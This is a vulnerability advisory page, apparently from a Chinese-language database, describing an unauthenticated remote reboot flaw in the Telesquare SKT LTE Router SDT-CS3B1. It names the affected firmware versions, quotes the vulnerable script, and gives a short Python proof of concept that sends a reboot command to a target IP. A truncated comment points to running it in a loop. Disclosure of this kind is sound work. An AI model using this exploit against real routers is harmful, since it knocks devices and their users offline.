Telesquare SKT LTE Router SDT-CS3B1...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### Summary We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G LTE wireless communication based LTE router product. ### Description The router suffers from an unauthenticated reboot command execution. Attackers can exploit this issue to cause a denial of service scenario. `/lte/lteuicc.shtml`: ``` 858: function RebootRequest() 859: { 860: var url = "../cgi-bin/lte.cgi?"; 861: var param = "Command=Reboot"; 862: XHRPost(RebootHandle, url, param, false ); //sync call 863: } ``` ### Vendor Telesquare Co., Ltd. - http://www.telesquare.co.kr ### Affected Version * FwVer: SDT-CS3B1, sw version 1.2.0 * LteVer: ML300S5XEA41_090 1 0.1.0 * Modem model: PM-L300S ### Tested On * lighttpd/1.4.20 ### PoC ``` import sys, requests if len(sys.argv) < 2: print 'SKT LTE Router SDT-CS3B1 Remote Reboot' print 'Usage: b00t.py <ip> <port>\n' quit() ip = sys.argv[1] port = sys.argv[2] r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot") # shw: while true; do ./b00t.py 10.0.0.17...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息